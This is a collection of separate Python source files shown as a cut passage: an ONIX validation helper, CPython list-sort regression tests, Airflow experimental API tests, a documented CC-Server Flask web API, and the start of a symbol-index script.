(V21, REFERENCE, XSD): schema.O21_XSD_REFERENCE,
(V30, SHORT, XSD): schema.O30_XSD_SHORT,
(V30, SHORT, RNG): schema.O30_RNG_SHORT,
(V30, REFERENCE, XSD): schema.O30_XSD_REFERENCE,
(V30, REFERENCE, RNG): schema.O30_RNG_REFERENCE,
}
SCHEMA_TYPE_PARSER_MAP = {
XSD: etree.XMLSchema,
RNG: etree.RelaxNG,
}
@classmethod
def from_tree(cls, tree):
"""
Construct OnixMeta from an ElementTree.
:param tree etree.ElementTree: LXML Parsed ONIX data
:return OnixMeta: Initialized OnixMeta instance
"""
root = tree.getroot()
if root.tag.endswith('ONIXmessage'):
onix_style = cls.SHORT
elif root.tag.endswith('ONIXMessage'):
onix_style = cls.REFERENCE
else:
raise OnixError('Bad root element: %s' % root.tag)
onix_version = root.attrib.get('release')
if onix_version is None:
log.warning('No release attribute on root element. Try namespace.')
try:
if cls.V21 in list(root.nsmap.values())[0]:
onix_version = cls.V21
elif cls.V30 in list(root.nsmap.values())[0]:
onix_version = cls.V30
else:
raise OnixError('Could not determin ONIX version.')
except IndexError:
raise OnixError('No release attribute and no Namespace :(')
namespaces = list(root.nsmap.values())
return cls(
xml_version=tree.docinfo.xml_version,
xml_encoding=tree.docinfo.encoding,
onix_version=onix_version,
onix_style=onix_style,
namespaces=namespaces
)
@classmethod
def from_file(cls, infile):
"""
Contruct OnixMeta from an infile.
:param infile: File or Path to file
:type infile: file or str
:return OnixMeta: Initialized OnixMeta instance
"""
tree = lxml.parse(infile)
return cls.from_tree(tree)
def get_ns_string(self):
if self.onix_version == self.V21:
tpl = 'http://www.editeur.org/onix/2.1/%s'
elif self.onix_version == self.V30:
tpl = 'http://ns.editeur.org/onix/3.0/%s'
return tpl % self.onix_style
def get_schema_file(self, schema_type=XSD):
key = self.onix_version, self.onix_style, schema_type
try:
return self.SCHEMA_MAP[key]
except KeyError:
raise OnixError('Found no {2} schema for ONIX {0} {1}'.format(*key))
_BaseMessage = namedtuple('Message', 'level validator location message error_type')
class Message(_BaseMessage):
"""
A Validation message representing a single error condition.
:param str level: Error level
:param str validator: The validator that raised the error
:param str location: Location of error (filename:line:column)
:param str message: Description of the error condiction
:param str error_type: Type of error
"""
def __str__(self):
return ' | '.join(self._asdict().values())
@property
def short(self):
"""Short string representation of message"""
return "{m.level} - {m.validator} - {m.location} - {m.message}".format(m=self)
@classmethod
def from_logentry(cls, logentry, filename=''):
"""Instanciate Message from lxml LogEntry object
:param _LogEntry logentry: Validatation error from LXML
:param str filename: Optional filename to prefix error location
:return Message:
"""
l = logentry
location = '%s:%s:%s' % (filename, l.line, l.column)
message = l.message or ''
message = re.sub('({.*?})', '', message)
return cls(
level=l.level_name,
validator=l.domain_name,
location=location,
message=message,
error_type=l.type_name
)
@classmethod
def from_exception(cls, exc, filename=''):
"""
:param Exception exc:
:param str filename: Optional filename to prefix error location
:return Message:
"""
return cls(
level='CRITICAL',
validator='ONIXCHECK',
location=filename,
message=exc.message,
error_type='EXCEPTION'
)
| |
from test import support
import random
import sys
import unittest
from functools import cmp_to_key
verbose = support.verbose
nerrors = 0
def check(tag, expected, raw, compare=None):
global nerrors
if verbose:
print(" checking", tag)
orig = raw[:] # save input in case of error
if compare:
raw.sort(key=cmp_to_key(compare))
else:
raw.sort()
if len(expected) != len(raw):
print("error in", tag)
print("length mismatch;", len(expected), len(raw))
print(expected)
print(orig)
print(raw)
nerrors += 1
return
for i, good in enumerate(expected):
maybe = raw[i]
if good is not maybe:
print("error in", tag)
print("out of order at index", i, good, maybe)
print(expected)
print(orig)
print(raw)
nerrors += 1
return
class TestBase(unittest.TestCase):
def testStressfully(self):
# Try a variety of sizes at and around powers of 2, and at powers of 10.
sizes = [0]
for power in range(1, 10):
n = 2 ** power
sizes.extend(range(n-1, n+2))
sizes.extend([10, 100, 1000])
class Complains(object):
maybe_complain = True
def __init__(self, i):
self.i = i
def __lt__(self, other):
if Complains.maybe_complain and random.random() < 0.001:
if verbose:
print(" complaining at", self, other)
raise RuntimeError
return self.i < other.i
def __repr__(self):
return "Complains(%d)" % self.i
class Stable(object):
def __init__(self, key, i):
self.key = key
self.index = i
def __lt__(self, other):
return self.key < other.key
def __repr__(self):
return "Stable(%d, %d)" % (self.key, self.index)
for n in sizes:
x = list(range(n))
if verbose:
print("Testing size", n)
s = x[:]
check("identity", x, s)
s = x[:]
s.reverse()
check("reversed", x, s)
s = x[:]
random.shuffle(s)
check("random permutation", x, s)
y = x[:]
y.reverse()
s = x[:]
check("reversed via function", y, s, lambda a, b: (b>a)-(b<a))
if verbose:
print(" Checking against an insane comparison function.")
print(" If the implementation isn't careful, this may segfault.")
s = x[:]
s.sort(key=cmp_to_key(lambda a, b: int(random.random() * 3) - 1))
check("an insane function left some permutation", x, s)
if len(x) >= 2:
def bad_key(x):
raise RuntimeError
s = x[:]
self.assertRaises(RuntimeError, s.sort, key=bad_key)
x = [Complains(i) for i in x]
s = x[:]
random.shuffle(s)
Complains.maybe_complain = True
it_complained = False
try:
s.sort()
except RuntimeError:
it_complained = True
if it_complained:
Complains.maybe_complain = False
check("exception during sort left some permutation", x, s)
s = [Stable(random.randrange(10), i) for i in range(n)]
augmented = [(e, e.index) for e in s]
augmented.sort() # forced stable because ties broken by index
x = [e for e, i in augmented] # a stable sort of s
check("stability", x, s)
#==============================================================================
class TestBugs(unittest.TestCase):
def test_bug453523(self):
# bug 453523 -- list.sort() crasher.
# If this fails, the most likely outcome is a core dump.
# Mutations during a list sort should raise a ValueError.
class C:
def __lt__(self, other):
if L and random.random() < 0.75:
L.pop()
else:
L.append(3)
return random.random() < 0.5
L = [C() for i in range(50)]
try:
L.sort()
except ValueError:
pass
@support.impl_detail(pypy=False)
def test_undetected_mutation(self):
# Python 2.4a1 did not always detect mutation
# So does pypy...
memorywaster = []
for i in range(20):
def mutating_cmp(x, y):
L.append(3)
L.pop()
return (x > y) - (x < y)
L = [1,2]
self.assertRaises(ValueError, L.sort, key=cmp_to_key(mutating_cmp))
def mutating_cmp(x, y):
L.append(3)
del L[:]
return (x > y) - (x < y)
self.assertRaises(ValueError, L.sort, key=cmp_to_key(mutating_cmp))
memorywaster = [memorywaster]
#==============================================================================
class TestDecorateSortUndecorate(unittest.TestCase):
def test_decorated(self):
data = 'The quick Brown fox Jumped over The lazy Dog'.split()
copy = data[:]
random.shuffle(data)
data.sort(key=str.lower)
def my_cmp(x, y):
xlower, ylower = x.lower(), y.lower()
return (xlower > ylower) - (xlower < ylower)
copy.sort(key=cmp_to_key(my_cmp))
def test_baddecorator(self):
data = 'The quick Brown fox Jumped over The lazy Dog'.split()
self.assertRaises(TypeError, data.sort, key=lambda x,y: 0)
def test_stability(self):
data = [(random.randrange(100), i) for i in range(200)]
copy = data[:]
data.sort(key=lambda t: t[0]) # sort on the random first field
copy.sort() # sort using both fields
self.assertEqual(data, copy) # should get the same result
def test_key_with_exception(self):
# Verify that the wrapper has been removed
data = list(range(-2, 2))
dup = data[:]
self.assertRaises(ZeroDivisionError, data.sort, key=lambda x: 1/x)
self.assertEqual(data, dup)
def test_key_with_mutation(self):
data = list(range(10))
def k(x):
del data[:]
data[:] = range(20)
return x
self.assertRaises(ValueError, data.sort, key=k)
def test_key_with_mutating_del(self):
data = list(range(10))
class SortKiller(object):
def __init__(self, x):
pass
def __del__(self):
del data[:]
data[:] = range(20)
def __lt__(self, other):
return id(self) < id(other)
try:
data.sort(key=SortKiller)
except ValueError:
pass
def test_key_with_mutating_del_and_exception(self):
data = list(range(10))
## dup = data[:]
class SortKiller(object):
def __init__(self, x):
if x > 2:
raise RuntimeError
def __del__(self):
del data[:]
data[:] = list(range(20))
self.assertRaises(RuntimeError, data.sort, key=SortKiller)
## major honking subtlety: we *can't* do:
##
## self.assertEqual(data, dup)
##
## because there is a reference to a SortKiller in the
## traceback and by the time it dies we're outside the call to
## .sort() and so the list protection gimmicks are out of
## date (this cost some brain cells to figure out...).
def test_reverse(self):
data = list(range(100))
random.shuffle(data)
data.sort(reverse=True)
self.assertEqual(data, list(range(99,-1,-1)))
def test_reverse_stability(self):
data = [(random.randrange(100), i) for i in range(200)]
copy1 = data[:]
copy2 = data[:]
def my_cmp(x, y):
x0, y0 = x[0], y[0]
return (x0 > y0) - (x0 < y0)
def my_cmp_reversed(x, y):
x0, y0 = x[0], y[0]
return (y0 > x0) - (y0 < x0)
data.sort(key=cmp_to_key(my_cmp), reverse=True)
copy1.sort(key=cmp_to_key(my_cmp_reversed))
self.assertEqual(data, copy1)
copy2.sort(key=lambda x: x[0], reverse=True)
self.assertEqual(data, copy2)
#==============================================================================
def test_main(verbose=None):
test_classes = (
TestBase,
TestDecorateSortUndecorate,
TestBugs,
)
support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in range(len(counts)):
support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print(counts)
if __name__ == "__main__":
test_main(verbose=True)
| |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from datetime import timedelta
import json
import unittest
from urllib.parse import quote_plus
from airflow import configuration
from airflow.api.common.experimental.trigger_dag import trigger_dag
from airflow.models import DagBag, DagRun, Pool, TaskInstance
from airflow.settings import Session
from airflow.utils.timezone import datetime, utcnow
from airflow.www_rbac import app as application
class TestApiExperimental(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(TestApiExperimental, cls).setUpClass()
session = Session()
session.query(DagRun).delete()
session.query(TaskInstance).delete()
session.commit()
session.close()
def setUp(self):
super(TestApiExperimental, self).setUp()
configuration.load_test_config()
app, _ = application.create_app(testing=True)
self.app = app.test_client()
def tearDown(self):
session = Session()
session.query(DagRun).delete()
session.query(TaskInstance).delete()
session.commit()
session.close()
super(TestApiExperimental, self).tearDown()
def test_task_info(self):
url_template = '/api/experimental/dags/{}/tasks/{}'
response = self.app.get(
url_template.format('example_bash_operator', 'runme_0')
)
self.assertIn('"email"', response.data.decode('utf-8'))
self.assertNotIn('error', response.data.decode('utf-8'))
self.assertEqual(200, response.status_code)
response = self.app.get(
url_template.format('example_bash_operator', 'DNE')
)
self.assertIn('error', response.data.decode('utf-8'))
self.assertEqual(404, response.status_code)
response = self.app.get(
url_template.format('DNE', 'DNE')
)
self.assertIn('error', response.data.decode('utf-8'))
self.assertEqual(404, response.status_code)
def test_trigger_dag(self):
url_template = '/api/experimental/dags/{}/dag_runs'
response = self.app.post(
url_template.format('example_bash_operator'),
data=json.dumps({'run_id': 'my_run' + utcnow().isoformat()}),
content_type="application/json"
)
self.assertEqual(200, response.status_code)
response = self.app.post(
url_template.format('does_not_exist_dag'),
data=json.dumps({}),
content_type="application/json"
)
self.assertEqual(404, response.status_code)
def test_trigger_dag_for_date(self):
url_template = '/api/experimental/dags/{}/dag_runs'
dag_id = 'example_bash_operator'
hour_from_now = utcnow() + timedelta(hours=1)
execution_date = datetime(hour_from_now.year,
hour_from_now.month,
hour_from_now.day,
hour_from_now.hour)
datetime_string = execution_date.isoformat()
# Test Correct execution
response = self.app.post(
url_template.format(dag_id),
data=json.dumps({'execution_date': datetime_string}),
content_type="application/json"
)
self.assertEqual(200, response.status_code)
dagbag = DagBag()
dag = dagbag.get_dag(dag_id)
dag_run = dag.get_dagrun(execution_date)
self.assertTrue(dag_run,
'Dag Run not found for execution date {}'
.format(execution_date))
# Test error for nonexistent dag
response = self.app.post(
url_template.format('does_not_exist_dag'),
data=json.dumps({'execution_date': execution_date.isoformat()}),
content_type="application/json"
)
self.assertEqual(404, response.status_code)
# Test error for bad datetime format
response = self.app.post(
url_template.format(dag_id),
data=json.dumps({'execution_date': 'not_a_datetime'}),
content_type="application/json"
)
self.assertEqual(400, response.status_code)
def test_task_instance_info(self):
url_template = '/api/experimental/dags/{}/dag_runs/{}/tasks/{}'
dag_id = 'example_bash_operator'
task_id = 'also_run_this'
execution_date = utcnow().replace(microsecond=0)
datetime_string = quote_plus(execution_date.isoformat())
wrong_datetime_string = quote_plus(
datetime(1990, 1, 1, 1, 1, 1).isoformat()
)
# Create DagRun
trigger_dag(dag_id=dag_id,
run_id='test_task_instance_info_run',
execution_date=execution_date)
# Test Correct execution
response = self.app.get(
url_template.format(dag_id, datetime_string, task_id)
)
self.assertEqual(200, response.status_code)
self.assertIn('state', response.data.decode('utf-8'))
self.assertNotIn('error', response.data.decode('utf-8'))
# Test error for nonexistent dag
response = self.app.get(
url_template.format('does_not_exist_dag', datetime_string,
task_id),
)
self.assertEqual(404, response.status_code)
self.assertIn('error', response.data.decode('utf-8'))
# Test error for nonexistent task
response = self.app.get(
url_template.format(dag_id, datetime_string, 'does_not_exist_task')
)
self.assertEqual(404, response.status_code)
self.assertIn('error', response.data.decode('utf-8'))
# Test error for nonexistent dag run (wrong execution_date)
response = self.app.get(
url_template.format(dag_id, wrong_datetime_string, task_id)
)
self.assertEqual(404, response.status_code)
self.assertIn('error', response.data.decode('utf-8'))
# Test error for bad datetime format
response = self.app.get(
url_template.format(dag_id, 'not_a_datetime', task_id)
)
self.assertEqual(400, response.status_code)
self.assertIn('error', response.data.decode('utf-8'))
class TestPoolApiExperimental(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(TestPoolApiExperimental, cls).setUpClass()
session = Session()
session.query(Pool).delete()
session.commit()
session.close()
def setUp(self):
super(TestPoolApiExperimental, self).setUp()
configuration.load_test_config()
app, _ = application.create_app(testing=True)
self.app = app.test_client()
self.session = Session()
self.pools = []
for i in range(2):
name = 'experimental_%s' % (i + 1)
pool = Pool(
pool=name,
slots=i,
description=name,
)
self.session.add(pool)
self.pools.append(pool)
self.session.commit()
self.pool = self.pools[0]
def tearDown(self):
self.session.query(Pool).delete()
self.session.commit()
self.session.close()
super(TestPoolApiExperimental, self).tearDown()
def _get_pool_count(self):
response = self.app.get('/api/experimental/pools')
self.assertEqual(response.status_code, 200)
return len(json.loads(response.data.decode('utf-8')))
def test_get_pool(self):
response = self.app.get(
'/api/experimental/pools/{}'.format(self.pool.pool),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.data.decode('utf-8')),
self.pool.to_json())
def test_get_pool_non_existing(self):
response = self.app.get('/api/experimental/pools/foo')
self.assertEqual(response.status_code, 404)
self.assertEqual(json.loads(response.data.decode('utf-8'))['error'],
"Pool 'foo' doesn't exist")
def test_get_pools(self):
response = self.app.get('/api/experimental/pools')
self.assertEqual(response.status_code, 200)
pools = json.loads(response.data.decode('utf-8'))
self.assertEqual(len(pools), 2)
for i, pool in enumerate(sorted(pools, key=lambda p: p['pool'])):
self.assertDictEqual(pool, self.pools[i].to_json())
def test_create_pool(self):
response = self.app.post(
'/api/experimental/pools',
data=json.dumps({
'name': 'foo',
'slots': 1,
'description': '',
}),
content_type='application/json',
)
self.assertEqual(response.status_code, 200)
pool = json.loads(response.data.decode('utf-8'))
self.assertEqual(pool['pool'], 'foo')
self.assertEqual(pool['slots'], 1)
self.assertEqual(pool['description'], '')
self.assertEqual(self._get_pool_count(), 3)
def test_create_pool_with_bad_name(self):
for name in ('', ' '):
response = self.app.post(
'/api/experimental/pools',
data=json.dumps({
'name': name,
'slots': 1,
'description': '',
}),
content_type='application/json',
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
json.loads(response.data.decode('utf-8'))['error'],
"Pool name shouldn't be empty",
)
self.assertEqual(self._get_pool_count(), 2)
def test_delete_pool(self):
response = self.app.delete(
'/api/experimental/pools/{}'.format(self.pool.pool),
)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.data.decode('utf-8')),
self.pool.to_json())
self.assertEqual(self._get_pool_count(), 1)
def test_delete_pool_non_existing(self):
response = self.app.delete(
'/api/experimental/pools/foo',
)
self.assertEqual(response.status_code, 404)
self.assertEqual(json.loads(response.data.decode('utf-8'))['error'],
"Pool 'foo' doesn't exist")
if __name__ == '__main__':
unittest.main()
| |
import os
import atexit
from multiprocessing import cpu_count
from flask import Flask, jsonify
request_handler = None
app = Flask('cc-server-web')
@app.route('/', methods=['GET'])
def get_root():
"""
.. :quickref: User API; Retrieve server version
Receive a message, indicating the server is running.
**Example request**
.. sourcecode:: http
GET / HTTP/1.1
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"version": "0.12.2"
}
"""
return jsonify({'version': '0.12.2'})
@app.route('/nodes/schema', methods=['GET'])
def get_nodes_schema():
"""
.. :quickref: User API; Get json-schema
Get json-schema used with `POST /nodes endpoint <#post--nodes>`__ for validation purposes.
"""
return request_handler.get_nodes_schema()
@app.route('/tasks/schema', methods=['GET'])
def get_tasks_schema():
"""
.. :quickref: User API; Get json-schema
Get json-schema used with `POST /tasks endpoint <#post--tasks>`__ for validation purposes.
"""
return request_handler.get_tasks_schema()
@app.route('/tasks/cancel/schema', methods=['GET'])
def get_tasks_cancel_schema():
"""
.. :quickref: User API; Get json-schema
Get json-schema used with `POST /tasks/cancel endpoint <#post--tasks-cancel>`__ for validation purposes.
"""
return request_handler.get_tasks_cancel_schema()
@app.route('/tasks/query/schema', methods=['GET'])
def get_tasks_query_schema():
"""
.. :quickref: User API; Get json-schema
Get json-schema used with `POST /tasks/query endpoint <#post--tasks-query>`__ for validation purposes.
"""
return request_handler.get_query_schema()
@app.route('/task-groups/query/schema', methods=['GET'])
def get_task_groups_query_schema():
"""
.. :quickref: User API; Get json-schema
Get json-schema used with `POST /task-groups/query endpoint <#post--task-groups-query>`__ for validation purposes.
"""
return request_handler.get_query_schema()
@app.route('/application-containers/query/schema', methods=['GET'])
def get_application_containers_query_schema():
"""
.. :quickref: User API; Get json-schema
Get json-schema used with `POST /application-containers/query endpoint <#post--application-containers-query>`__ for
validation purposes.
"""
return request_handler.get_query_schema()
@app.route('/data-containers/query/schema', methods=['GET'])
def get_data_containers_query_schema():
"""
.. :quickref: User API; Get json-schema
Get json-schema used with `POST /data-containers/query endpoint <#post--data-containers-query>`__ for validation
purposes.
"""
return request_handler.get_query_schema()
@app.route('/nodes', methods=['GET'])
def get_nodes():
"""
.. :quickref: User API; Query cluster nodes
Query the status of all nodes in the cluster.
**Example request**
.. sourcecode:: http
GET /nodes HTTP/1.1
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"nodes": [{
"active_application_containers": [],
"active_data_containers": [],
"cluster_node": "cc-node2",
"debug_info": null,
"is_online": true,
"reserved_ram": 0,
"total_cpus": 2,
"total_ram": 2002
}, {
"active_application_containers": [],
"active_data_containers": [],
"cluster_node": "cc-node1",
"debug_info": null,
"is_online": true,
"reserved_ram": 0,
"total_cpus": 2,
"total_ram": 2002
}]
}
"""
return request_handler.get_nodes()
@app.route('/nodes', methods=['POST'])
def post_nodes():
"""
.. :quickref: Dev API; Update cluster nodes
**Developer documentation**
*Requires admin user.*
Update the status of cluster nodes specified in the request. The endpoint can be used to notify CC-Server after a
dead cluster node has been repaired.
**Example request**
.. sourcecode:: http
POST /nodes HTTP/1.1
{
"nodes": [{
"name": "cc-node2"
}]
}
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{}
"""
return request_handler.post_nodes()
@app.route('/tasks/query', methods=['POST'])
def post_tasks_query():
"""
.. :quickref: User API; Query tasks
Send JSON object with a query, in order to retrieve a list of tasks.
Admin users can retrieve tasks from every other user, while standard users can only retrieve their own tasks.
**JSON fields**
* **aggregate** (required): List of steps to be performed as MongoDB aggregation pipeline
Take a look at the
`MongoDB documentation <https://docs.mongodb.com/manual/reference/operator/aggregation-pipeline/>`__ for further
instructions.
The permitted operations in the aggregation pipeline are:
$match, $project, $limit, $skip, $count, $sort, $unwind, $group, $sample, $replaceRoot, $addFields.
**Example request**
.. sourcecode:: http
POST /tasks/query HTTP/1.1
Accept: application/json
{
"aggregate": [
{"$match": {"_id": {"$in": ["57f63f73e004231a26ed187e", "57f63f73e004231a26ed187f"]}}},
{"$sort": {"_id": -1}},
{"$project": {"state": 1}},
{"$limit": 2}
]
}
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"tasks": [
{"_id": "57f63f73e004231a26ed187f", "state": 2},
{"_id": "57f63f73e004231a26ed187e", "state": 2}
]
}
"""
return request_handler.post_tasks_query()
@app.route('/tasks', methods=['POST'])
def post_tasks():
"""
.. :quickref: User API; Schedule tasks
Send JSON object with one or more task descriptions, in order to schedule them with the server.
**JSON fields**
* **tags** (optional): Tags are optional descriptions of given tasks. Can be used to identify tasks in the database.
* **no_cache** (optional, default = *false*): If *true*, no data container is launched for the given task, such that the app container downloads input files directly.
* **application_container_description.image** (required): URL pointing to a Docker image in a Docker registry.
* **application_container_description.container_ram** (required): Amount of RAM assigned to the app container in Megabytes.
* **application_container_description.registry_auth** (optional, default = None): If the specified image is not publicly accessible, a dict with username and password keys must be defined.
* **application_container_description.entry_point** (optional, default is specified in local_docker_config.toml of CC-Server): Program invoked by CC-Server when starting the app container. Only required if the location of the CC-Container-Worker in the container image is customized.
* **application_container_description.parameters** (optional): Parameters are given to the app, when executed by CC-Container-Worker. Depending on the configuration of the container image. Parameters can be a JSON object or array.
* **input_files** (required): List of input files in remote data repositories. This list maps to the list of local_input_files specified in the container image configuration. The list might be empty.
* **result_files** (required): List of destinations of result files in remote data repositories. This list maps to the list of local_result_files specified in the container image configuration.
* **notifications** (optional): List of HTTP servers that will receive a notification as soon as the task succeeded, failed or got cancelled.
**Example request 1: single task**
.. sourcecode:: http
POST /tasks HTTP/1.1
Accept: application/json
{
"tags": ["experiment1"],
"no_cache": true,
"application_container_description": {
"image": "docker.io/curiouscontainers/cc-sample-app",
"container_ram": 1024,
"registry_auth": {
"username": "USERNAME",
"password": "PASSWORD"
},
"entry_point": "python3 /opt/container_worker",
"parameters": ["--arg1", "value1", "--arg2", "value2"]
},
"input_files": [{
"connector_type": "ssh",
"connector_access": {
"host": "my-domain.tld",
"username": "ccdata",
"password": "PASSWORD",
"file_dir": "/home/ccdata/input_files",
"file_name": "some_data.csv"
}
}],
"result_files": [{
"local_result_file": "file_a",
"connector_type": "ssh",
"connector_access": {
"host": "my-domain.tld",
"username": "ccdata",
"password": "PASSWORD",
"file_dir": "/home/ccdata/result_files",
"file_name": "some_data.csv"
}
}, {
"local_result_file": "file_b",
"connector_type": "ssh",
"connector_access": {
"host": "my-domain.tld",
"username": "ccdata",
"password": "PASSWORD",
"file_dir": "/home/ccdata/result_files",
"file_name": "parameters.txt"
}
}],
"notifications": [{
"url": "my-domain.tld/notify/",
"method": "POST"
}]
}
**Example response 1**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"_id": "57fbf45df62690000101afa5"
}
**Example request 2: multiple tasks**
.. sourcecode:: http
POST /tasks HTTP/1.1
Accept: application/json
{
"tasks": [{
"application_container_description": {
"image": "docker.io/curiouscontainers/cc-sample-app",
"container_ram": 1024
},
"input_files": [{
"connector_type": "http",
"connector_access": {
"url": "https://my-domain.tld/input_files/A/some_data.csv"
}
}],
"result_files": [{
"local_result_file": "file_a",
"connector_type": "http",
"connector_access": {
"url": "https://my-domain.tld/result_files/A/1/",
"method": "POST"
}
}, {
"local_result_file": "file_b",
"connector_type": "http",
"connector_access": {
"url": "https://my-domain.tld/result_files/A/2/",
"method": "POST"
}
}]
}, {
"application_container_description": {
"image": "docker.io/curiouscontainers/cc-sample-app",
"container_ram": 1024
},
"input_files": [{
"connector_type": "http",
"connector_access": {
"url": "https://my-domain.tld/input_files/B/some_data.csv"
}
}],
"result_files": [{
"local_result_file": "file_a",
"connector_type": "http",
"connector_access": {
"url": "https://my-domain.tld/result_files/B/1/",
"method": "POST"
}
}, {
"local_result_file": "file_b",
"connector_type": "http",
"connector_access": {
"url": "https://my-domain.tld/result_files/B/2/",
"method": "POST"
}
}]
}]
}
**Example response 2**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"task_group_id": "57fbf45df62690000101afa4",
"tasks": [{
"_id": "57fbf45df62690000101afa5"
}, {
"_id": "57fbf45df62690000101afa6"
}]
}
"""
return request_handler.post_tasks()
@app.route('/tasks/cancel', methods=['POST'])
def post_tasks_cancel():
"""
.. :quickref: User API; Cancel tasks
Send JSON object with one or more task IDs, in order to cancel their execution if they are still running.
Admin users can cancel tasks from every other user, while standard users can only cancel their own tasks.
**JSON fields**
* **_id** (required)
**Example request 1: single task**
.. sourcecode:: http
POST /tasks/cancel HTTP/1.1
Accept: application/json
{
"_id": "57c3f73ae004232bd8b9b005"
}
**Example response 1: single task**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"_id": "57c3f73ae004232bd8b9b005",
"state": 5
}
**Example request 2: multiple tasks**
.. sourcecode:: http
POST /tasks/cancel HTTP/1.1
Accept: application/json
{
"tasks": [{
"_id": "57c3f73ae004232bd8b9b005"
},{
"_id": "57c3f73ae004232bd8b9b006"
}]
}
**Example response 2**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"tasks": [{
"_id": "57c3f73ae004232bd8b9b005",
"state": 5
}, {
"_id": "57c3f73ae004232bd8b9b006",
"state": 5
}]
}
"""
return request_handler.post_tasks_cancel()
@app.route('/token', methods=['GET'])
def get_token():
"""
.. :quickref: User API; Retrieve authentication token
Send JSON object with username and password, in order to retrieve an authentication token.
For subsequent requests the password can be replaced by the token value for authentication.
Tokens are tied to the IP address of the requesting user and only valid for a certain period of time defined in the
CC-Server configuration.
When requesting another token, the original password must be used for authentication.
**Example request**
.. sourcecode:: http
GET /token HTTP/1.1
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"token": "7e2950f21e3f0afd77253b8e13e2ee4da923e545389d424b",
"valid_for_seconds": 172800
}
"""
return request_handler.get_token()
@app.route('/task-groups/query', methods=['POST'])
def post_task_groups_query():
"""
.. :quickref: User API; Query task groups
Send JSON object with a query, in order to retrieve a list of task groups.
Admin users can retrieve task groups from every other user, while standard users can only retrieve their own task
groups.
Works exactly like the `POST /tasks/query endpoint <#post--tasks-query>`__.
"""
return request_handler.post_task_groups_query()
@app.route('/application-containers/query', methods=['POST'])
def post_application_containers_query():
"""
.. :quickref: User API; Query app containers
Send JSON object with a query, in order to retrieve a list of app containers.
Admin users can retrieve app containers from every other user, while standard users can only retrieve their own app
containers.
Works exactly like the `POST /tasks/query endpoint <#post--tasks-query>`__.
"""
return request_handler.post_application_containers_query()
@app.route('/data-containers/query', methods=['POST'])
def post_data_containers_query():
"""
.. :quickref: User API; Query data containers
Send JSON object with a query, in order to retrieve a list of data containers.
Admin users can retrieve data containers from every other user, while standard users can only retrieve their own
data containers.
Works exactly like the `POST /tasks/query endpoint <#post--tasks-query>`__.
"""
return request_handler.post_data_containers_query()
@app.route('/application-containers/callback', methods=['POST'])
def post_application_container_callback():
"""
.. :quickref: Dev API; App container callbacks
**Developer documentation**
Callback endpoint for app containers.
**JSON fields**
* **callback_key** (required)
* **callback_type** (required)
* **container_id** (required)
* **content** (required)
**Example request**
.. sourcecode:: http
POST /application-containers/callback HTTP/1.1
Accept: application/json
{
"callback_key": "6318aa06b08935ba12f6396cb25981b1a7e71586d6100338",
"callback_type": 3,
"container_id": "57c3f517e00423251662f036",
"content": {
"state": 3,
"description": "Result files sent."
}
}
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{}
"""
return request_handler.post_application_container_callback()
@app.route('/data-containers/callback', methods=['POST'])
def post_data_container_callback():
"""
.. :quickref: Dev API; Data container callbacks
**Developer documentation**
Callback endpoint data containers.
**JSON fields**
* **callback_key** (required)
* **callback_type** (required)
* **container_id** (required)
* **content** (required)
**Example request**
.. sourcecode:: http
POST /data-containers/callback HTTP/1.1
Accept: application/json
{
"callback_key": "6318aa06b08935ba12f6396cb25981b1a7e71586d6100338",
"callback_type": 0,
"container_id": "57c3f517e00423251662f036",
"content": {
"state": 3,
"description": "Container started."
}
}
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{}
"""
return request_handler.post_data_container_callback()
def prepare():
import zmq
from cc_server.commons.configuration import Config
from cc_server.commons.helper import close_sockets
from cc_server.services.web.request_handler import RequestHandler
config = Config()
context = zmq.Context()
logger_socket = context.socket(zmq.PUSH)
logger_socket.connect(config.server_log['external_url'])
tee = logger_socket.send_string
master_socket = context.socket(zmq.PUSH)
master_socket.connect(config.server_master['external_url'])
atexit.register(close_sockets, [logger_socket, master_socket])
global request_handler
request_handler = RequestHandler(
config=config,
tee=tee,
master=master_socket
)
tee('Started service web with pid {}'.format(os.getpid()))
return config
def main():
from cc_server.commons.configuration import Config
from cc_server.commons.gunicorn_integration import WebApp
config = Config()
options = {
'bind': '{}:{}'.format(
config.server_web['bind_host'],
config.server_web['bind_port']
),
'workers': config.server_web.get('num_workers', cpu_count()),
'worker_class': 'gevent'
}
WebApp(app_module='cc_server.services.web.wsgi', options=options).run()
if __name__ == '__main__':
main()
| |
#!/usr/bin/python
import sys, re, string
########## Symbol index generation code #############
def fail(msg):
print >>sys.stderr, msg
exit(1)
symbols = dict()
